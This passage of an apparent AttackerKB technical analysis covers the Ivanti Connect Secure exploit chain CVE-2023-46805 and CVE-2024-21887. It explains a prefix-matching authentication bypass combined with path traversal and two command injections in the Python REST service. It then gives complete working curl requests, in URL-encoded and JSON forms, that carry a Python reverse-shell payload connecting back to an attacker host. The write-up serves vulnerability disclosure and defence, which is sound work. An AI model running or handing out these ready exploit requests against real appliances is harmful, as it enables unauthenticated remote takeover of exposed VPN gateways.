"PUT, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata"
@@ -510,10 +510,10 @@
"POST, 403, /api/v1/saml-config/sp"
"PUT, 403, /api/v1/saml-config/sp"
"DELETE, 403, /api/v1/saml-config/sp"
-"GET, 302, /api/v1/sdpotp"
-"POST, 302, /api/v1/sdpotp"
-"PUT, 302, /api/v1/sdpotp"
-"DELETE, 302, /api/v1/sdpotp"
+"GET, 403, /api/v1/sdpotp"
+"POST, 403, /api/v1/sdpotp"
+"PUT, 403, /api/v1/sdpotp"
+"DELETE, 403, /api/v1/sdpotp"
"GET, 403, /api/v1/snmp/download-mib"
"POST, 403, /api/v1/snmp/download-mib"
"PUT, 403, /api/v1/snmp/download-mib"
@@ -682,10 +682,10 @@
"POST, 403, /api/v1/system/failed-login-count"
"PUT, 403, /api/v1/system/failed-login-count"
"DELETE, 403, /api/v1/system/failed-login-count"
-"GET, 200, /api/v1/system/healthcheck"
-"POST, 200, /api/v1/system/healthcheck"
-"PUT, 200, /api/v1/system/healthcheck"
-"DELETE, 200, /api/v1/system/healthcheck"
+"GET, 403, /api/v1/system/healthcheck"
+"POST, 403, /api/v1/system/healthcheck"
+"PUT, 403, /api/v1/system/healthcheck"
+"DELETE, 403, /api/v1/system/healthcheck"
"GET, 403, /api/v1/system/ifmap/imported-sessions"
"POST, 403, /api/v1/system/ifmap/imported-sessions"
"PUT, 403, /api/v1/system/ifmap/imported-sessions"
@@ -830,10 +830,10 @@
"POST, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
"PUT, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
"DELETE, 403, /api/v1/totp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
-"GET, 405, /api/v1/totp/user-backup-code"
-"POST, 500, /api/v1/totp/user-backup-code"
-"PUT, 405, /api/v1/totp/user-backup-code"
-"DELETE, 405, /api/v1/totp/user-backup-code"
+"GET, 403, /api/v1/totp/user-backup-code"
+"POST, 403, /api/v1/totp/user-backup-code"
+"PUT, 403, /api/v1/totp/user-backup-code"
+"DELETE, 403, /api/v1/totp/user-backup-code"
"GET, 403, /api/v1/ueba/"
"POST, 403, /api/v1/ueba/"
"PUT, 403, /api/v1/ueba/"
Of the 376 URI paths pulled from the web and REST servers, 15 have a different
HTTP response after the mitigation has been applied, and all are located in the
REST API. So we will focus our attention on the Python based REST API service.
After investigating several of the endpoints that returned a different HTTP
response, we focus on the endpoint /api/v1/totp/user-backup-code. The native
code web server has a function doAuthCheck that will test a URI to see if
authentication needs to be performed, before the request is served. We can see
that several paths do not need authentication. Of note is the use of a strncmp,
which will only check the first N characters of the path. This means that a path
that begins with /api/v1/totp/user-backup-code will not have authentication
enforced, and this path can also contain additional characters appended to it,
all of which will be passed to the Python backend REST service when the request
is proxied.
// web!doAuthCheck
bool __cdecl doAuthCheck(DSLog::Debug *a1, unsigned int *a2)
{
// ...snip...
uri_path = a1->uri_path;
if ( !strncmp((const char *)uri_path, "/api/v1/ueba/", 0xDu)
|| !strncmp((const char *)uri_path, "/api/v1/integration/", 0x14u)
|| !strncmp((const char *)uri_path, "/api/v1/dsintegration", 0x15u)
|| !strncmp((const char *)uri_path, "/api/v1/pps/action/", 0x13u)
|| !strncmp((const char *)uri_path, "/api/my-session", 0xFu)
|| !strncmp((const char *)uri_path, "/api/v1/totp/user-backup-code", 0x1Du) // <---
|| !strncmp((const char *)uri_path, "/api/v1/esapdata", 0x10u)
|| !strncmp((const char *)uri_path, "/api/v1/sessions", 0x10u)
|| !strncmp((const char *)uri_path, "/api/v1/tasks", 0xDu)
|| !strncmp((const char *)uri_path, "/api/v1/gateways", 0x10u)
|| !strncmp((const char *)uri_path, "/_/api/aaa", 0xAu)
|| !strncmp((const char *)uri_path, "/api/v1/oidc", 0xCu) )
{
return 1; // <---
}
// ...go on and enforce authentication...
Additional authentication checks appear to occur in the function
PyRestHandler::handleRequest, but not for the path
/api/v1/totp/user-backup-code.
Knowing we can reach the internal Python REST service by requesting the
unauthenticated /api/v1/totp/user-backup-code endpoint, and knowing we can also
supply additional characters in the path, all of which will be passed to the
Python Flask application, we can experiment with trying to access other
resources located in the Flask application by using double dot notation. It
transpires that we can access any resource in the Flask application using this
technique, bypassing any authentication checks in the native web server.
To test the auth bypass we first try to access the authenticated REST API
endpoint /api/v1/system/system-information while providing neither an
authentication cookie nor a valid API key. As expected, this request will fail
with a HTTP 403 forbidden error.
$ curl -ik https://192.168.86.111/api/v1/system/system-information
HTTP/1.1 403 Forbidden
Transfer-Encoding: chunked
X-XSS-Protection: 1
Strict-Transport-Security: max-age=31536000
Next we can access our target endpoint via the auth bypass technique, by using a
URI path of /api/v1/totp/user-backup-code/../../system/system-information. We
can see this request will succeed, returning the system information.
$ curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/system-information
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 297
{"software-inventory":{"software":{"build":"1647","name":"IVE-OS","type":"operating-system","version":"22.3R1"}},"system-information":{"hardware-model":"ISA-V","host-name":"localhost2","machine-id":"*****************","os-name":"ive-sa","os-version":"22.3R1","serial-number":"*****************"}}
We can now access any endpoint in the Python REST backend, and can begin to
search for a suitable authenticated command injection vulnerability to chain to
this auth bypass to, in order to achieve unauthenticated RCE.
INJECTING COMMANDS
As we are hunting for a command injection vulnerability, and we are targeting a
Python service, a good candidate to search for is the usage of Popen and system
function calls. These functions allow for the creation of a child process with
caller supplied arguments and are often the cause of command injection
vulnerabilities in Python applications.
The REST service implements the logic for its endpoints in the
restservice-0.1-py3.6.egg file, so we can extract this and grep for candidates
to go bug hunting in.
$ unzip ics_disk1/root/home/venv3/lib/python3.6/site-packages/restservice-0.1-py3.6.egg -d restservice-0.1
$ cd restservice-0.1/
restservice-0.1$ grep -r Popen --include=*.py
restservice/api/resources/config.py: proc = subprocess.Popen(
restservice/api/resources/config.py: proc = subprocess.Popen(args, stdout=subprocess.PIPE)
restservice/api/resources/config.py: proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE)
restservice/api/resources/localbackupsysconfiganduseracc.py: proc = subprocess.Popen(
restservice/api/resources/localbackupsysconfiganduseracc.py: proc = subprocess.Popen(
restservice/api/resources/localbackupsysconfiganduseracc.py: proc = subprocess.Popen(
restservice/api/resources/controller.py: proc = subprocess.Popen(
restservice/api/resources/controller.py: proc = subprocess.Popen(
restservice/api/resources/exportxml.py: proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE)
restservice/api/resources/webprofile.py: proc = subprocess.Popen(
restservice/api/resources/webprofile.py: cabbase_proc = subprocess.Popen(
restservice/api/resources/awsazuretestconnection.py: proc = subprocess.Popen(
restservice/api/resources/html5.py: # proc = subprocess.Popen(smbClientCmd, shell=True, stdout=subprocess.PIPE)
restservice/api/resources/nsaregistration.py: proc = subprocess.Popen(
restservice/api/resources/exportuniversalxml.py: proc = subprocess.Popen(popen_args, stdout=subprocess.PIPE)
restservice/api/resources/license.py: proc = subprocess.Popen(
restservice/api/resources/license.py: proc = subprocess.Popen(
restservice/api/resources/license.py: proc = subprocess.Popen(
restservice/api/resources/license.py: proc = subprocess.Popen(
restservice/api/resources/license.py: proc = subprocess.Popen(
Reviewing the 20 results that come back we identify several usages of Popen
whereby the command passed to Popen is constructed from a sequence of +
operators which concatenate the strings together. Popen can alternatively take
an array of arguments rather than a single string, and some of the results from
our grepping above use this form, which is generally safe from command injection
(but not necessarily argument injection).
We identified two authenticated command injection vulnerabilities, both of which
are likely candidates for CVE-2024-21887. We have verified that both
vulnerabilities are prevented from working when the vendor supplied mitigation
is applied.
FIRST COMMAND INJECTION
Of the instances of Popen that concatenate their command string together, we
identify the get method in the file restservice/api/resources/license.py which
handles requests for the endpoint /api/v1/license/keys-status.
class License(Resource):
"""
Handles requests that are coming for licensing APIs
For now the only API is license/auth-code
"""
# ...snip...
def get(self, url_suffix=None, node_name=None):
if request.path.startswith("/api/v1/license/keys-status"):
try:
dsinstall = os.environ.get("DSINSTALL")
if node_name == None:
node_name = ""
proc = subprocess.Popen(
dsinstall
+ "/perl5/bin/perl"
+ " "
+ dsinstall
+ "/perl/getLicenseCapacity.pl"
+ " getLicenseKeys "
+ node_name, # <---
shell=True,
stdout=subprocess.PIPE,
)
If an attacker can supply an arbitrary node_name value, then command injection
can be achieved. As this is a Flask application, we look to see how these
endpoints are mapped by inspecting restservice\api\__init__.py.
import logging
from flask import Flask
from flask_restful import Api
from logger.logger import Logger
from logger.proxyhandler import ProxyHandler
app = Flask(__name__)
app.logger.setLevel(logging.DEBUG)
app.logger.addHandler(ProxyHandler("CONFIG:API:APP"))
ive_logger = Logger()
api = Api(app)
# ...snip...
api.add_resource(
License,
# ...snip...
"/api/v1/license/keys-status",
"/api/v1/license/keys-status/<path:node_name>", # <---
# ...snip...
resource_class_kwargs={"ive_logger": ive_logger},
)
# ...snip...
We can see the parameter node_name is automatically mapped from the trailing
path segment in the request’s URI path
/api/v1/license/keys-status/<path:node_name>. We can therefore achieve an
unauthenticated command injection by performing a GET request to the URI path
/api/v1/totp/user-backup-code/../../license/keys-status/;CMD;, (where CMD is an
arbitrary linux OS command).
By using the semicolon character we can specify an arbitrary command to execute
during Popen. As we are passing the arbitrary command as part of the URI in the
GET request, we must URL encode our payload. For example a Python based reverse
shell payload:
;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.43",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';
Will be encoded as follows:
%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%38%36%2e%34%33%22%2c%34%34%34%34%29%29%3b%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%2c%73%74%64%69%6e%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%6f%75%74%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%65%72%72%3d%73%2e%66%69%6c%65%6e%6f%28%29%29%27%3B
And we can exploit the appliance with a single curl request and achieve
unauthenticated OS command execution:
$ curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../license/keys-status/%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%38%36%2e%34%33%22%2c%34%34%34%34%29%29%3b%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%2c%73%74%64%69%6e%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%6f%75%74%3d%73%2e%66%69%6c%65%6e%6f%28%29%2c%73%74%64%65%72%72%3d%73%2e%66%69%6c%65%6e%6f%28%29%29%27%3B
We have verified that the vendor-supplied mitigation will prevent this exploit
from working.
SECOND COMMAND INJECTION
As we found several occurrences of Popen, we also identified a second
authenticated command injection vulnerability. The file
restservice\api\resources\awsazuretestconnection.py has the following function
to handle POST requests to the endpoint
/api/v1/system/maintenance/archiving/cloud-server-test-connection.
class AwsAzureTestConnection(Resource):
# ...snip...
def post(self):
"""
Available API
/api/v1/system/maintenance/archiving/cloud-server-test-connection
POST Body:
{
"type":"AZURE",
"txtS3Server":"<AWS-S3-bucket-name>",
"txtS3Directory":"<AWS-S3-bucket-location>",
"txtS3User":"<AWS-access-key>",
"txtS3Password":"<AWS-secret-key>",
"txtazureServer":"<Azure-server-name>",
"txtazureUser":"<Azure-user-name>",
"txtazurePassword":"<Azure-password>"
}
/api/v1/system/maintenance/archiving/cloud-server-test-connection
POST Body:
{
"type": "GCP",
"txtGCPProject":"ProjName",
"txtGCPSecret":"/homes/preritc/JsonKey",
"txtGCPPath":"Path/DirPath",
"txtGCPBucket":"bucket-mumbai"
}
"""
server_information = []
method = ""
if request.path.endswith("cloud-server-test-connection"):
if request.json is None:
return make_response(
jsonify(self.get_error_response("Accepts only JSON")), 400
)
else:
if "type" not in request.json:
return make_response(
jsonify(
self.get_error_response(
"Please specify the Type as AWS or AZURE or GCP"
)
),
400,
)
else:
tmpKeyFile = None
method = request.json.get("type", "") # <---
if method == "GCP":
secretKeyJson = request.json.get("txtGCPSecret")
if not secretKeyJson:
# Secret Key not provided in request body, look for existing config in cache
ci = DSCacheItem("archive", "info")
table = DSUtilTable()
ci.getUtilTable(table)
secretKeyJson = table.getValue("password")
if not secretKeyJson:
return make_response(
jsonify(
self.get_error_response(
"No existing Secret Key configuration found, please upload an appropriate JSON file and try again."
)
),
400,
)
try:
# Attribute is expected to have file content in base64 encoded format
secretKeyJson = base64.b64decode(secretKeyJson)
# File with decoded JSON required by CloudStorageClient tool to test the connection
tmpKeyFile = tempfile.NamedTemporaryFile(suffix=".json")
tmpKeyFile.write(secretKeyJson)
tmpKeyFile.seek(0)
request.json["txtGCPSecret"] = tmpKeyFile.name
except (base64.binascii.Error, OSError) as err:
return make_response(
jsonify(
self.get_error_response(
"Could not store secret key JSON in temporary file. Error: {0}".format(
err
)
)
),
400,
)
for i in gcpserverMajorKeys:
if (
i in list(request.json.keys())
and len(request.json.get(i, "")) > 0
):
server_information.append(request.json.get(i, ""))
else:
server_information.append("None")
if method == "AWS":
for i in awsserverMajorKeys:
if (
i in list(request.json.keys())
and len(request.json.get(i, "")) > 0
):
server_information.append(request.json.get(i, ""))
else:
server_information.append("None")
if method == "AZURE":
for i in azureserverMajorKeys:
if (
i in list(request.json.keys())
and len(request.json.get(i, "")) > 0
):
server_information.append(request.json.get(i, ""))
else:
server_information.append("None")
for i in serverOptionKeys:
if (
i in list(request.json.keys())
and request.json.get(i, "") != ""
):
server_information.append(request.json.get(i, ""))
else:
server_information.append("filter_default")
for i in serverCheckKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
for i in serverUploadLogKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
for i in serverSensorsLogFilterKeys:
if (
i in list(request.json.keys())
and request.json.get(i, "") != ""
):
server_information.append(request.json.get(i, ""))
else:
server_information.append("filter_default")
for i in serverSensorsLogKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
for i in serverXmlKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
for i in serverIVSKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
for i in serverIVSPasswdKeys:
if (
i in list(request.json.keys())
and len(request.json.get(i, "")) > 0
):
server_information.append(request.json.get(i, ""))
else:
server_information.append("None")
for i in serverURSdbKeys:
if (
i in list(request.json.keys())
and len(request.json.get(i, "")) > 0
):
if len(request.json.get(i, "")) > 0:
server_information.append(1)
else:
server_information.append(0)
for i in serverURSPasswordKeys:
if (
i in list(request.json.keys())
and len(request.json.get(i, "")) > 0
):
if len(request.json.get(i, "")) > 0:
server_information.append(1)
else:
server_information.append(0)
for i in serverDebugLogKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
for i in serverSnapShotKeys:
if i in list(request.json.keys()):
if request.json.get(i, "") == "ON":
server_information.append(1)
else:
server_information.append(0)
if (request.json.get("chkExcludeLargeData", "") == "") or (
"chkExcludeLargeData" not in request.json
):
server_information.append(0)
if request.json.get("chkExcludeLargeData", "") == "ON":
server_information.append(1)
if method == "GCP":
if (
"txtGCPPath" in list(request.json.keys())
and request.json.get("txtS3Path", "") != ""
):
server_information.append(
request.json.get("txtGCPPath", "")
)
else:
server_information.append("")
if method == "AWS":
if (
"txtS3Path" in list(request.json.keys())
and request.json.get("txtS3Path", "") != ""
):
server_information.append(request.json.get("txtS3Path", ""))
else:
server_information.append("")
if method == "AZURE":
if (
"txtAzurePath" in list(request.json.keys())
and request.json.get("txtAzurePath", "") != ""
):
server_information.append(
request.json.get("txtAzurePath", "")
)
else:
server_information.append("")
We can see above that the variable called method is set from the request’s JSON
content data, via a key called type. If an attacker supplies a semicolon
delimited OS command in this value it will be executed via Popen.
dsinstall = os.environ.get("DSINSTALL")
proc = subprocess.Popen(
dsinstall
+ "/perl5/bin/perl"
+ " "
+ dsinstall
+ "/perl/AwsAzureTestConnection.pl "
+ method # <---
+ " "
+ " ".join([str(x) for x in list(server_information)]),
shell=True,
stdout=subprocess.PIPE,
)
Using the same python reverse shell payload from the first command injection, we
can construct a JSON structure to trigger the vulnerability (as the payload is
in JSON, it does not need to be URL-encoded).
{
"type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.86.35\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
"txtGCPProject": "a",
"txtGCPSecret": "a",
"txtGCPPath": "a",
"txtGCPBucket": "a"
}
While the endpoint
/api/v1/system/maintenance/archiving/cloud-server-test-connection is
authenticated, we can chain the auth bypass vulnerability and construct an
unauthenticated URI path
/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection
to reach this endpoint and exploit the vulnerability.
A single curl request to achieve unauthenticated OS command execution is then
performed as follows:
curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.86.43\\\",4444));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'
We have verified that the vendor supplied mitigation will prevent this exploit
from working.
REMEDIATION
Ivanti disclosed both CVE-2023-46805 and CVE-2024-21887 on January 10, 2024, but
this was done prior to the release of official patches, which are scheduled for
a staggered release beginning on January 22, 2024. Ivanti has provided an
interim solution in the form of an XML mitigation file that blocks access to
certain URLs in order to prevent the exploit chain from working. It is highly
recommended to apply this interim workaround on an urgent basis.
A knowledge base article is available for further details on Ivanti’s interim
workaround.
REFERENCES
* Vendor Advisory
* Rapid7 Blog
* watchTowr Blog
REPORT AS EXPLOITED IN THE WILD
AttackerKB users want to know this is information they can trust.
Help the community by indicating the source(s) of your knowledge:
* Vendor Advisory
Add a reference URL (optional):
* Government or Industry Alert
Add a reference URL (optional):
* Threat Feed
Add a reference URL (optional):
* News Article or Blog
Add a reference URL (optional):
* Exploitation personally observed in an environment (client, customer,
employer, or personal environment)
Add a reference URL (optional):
* Other:
Please explain the source of your report.
Add a reference URL (optional):
Report and add more details Report as Exploited Update Report
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references
from the CVE list and the National Vulnerability Database. If available, please
supply below:
CVE ID:
ADD REFERENCES:
Cancel Submit
QUICK COOKIE NOTIFICATION
This site uses cookies for anonymized analytics to improve the site.
Rapid7 will never sell the data collected on this site.
I AGREE, LET’S GO!
--------------------------------------------------------------------------------
View our Cookie Policy for full details
This site uses cookies for anonymized analytics. For more information or to
change your cookie settings, view our Cookie Policy.
Terms of Use Code of Conduct FAQ Changelog Privacy Policy Contact API A Rapid7
Project
WATCH THIS TOPIC
Watch this topic to be notified when new information, assessments, and comments
are added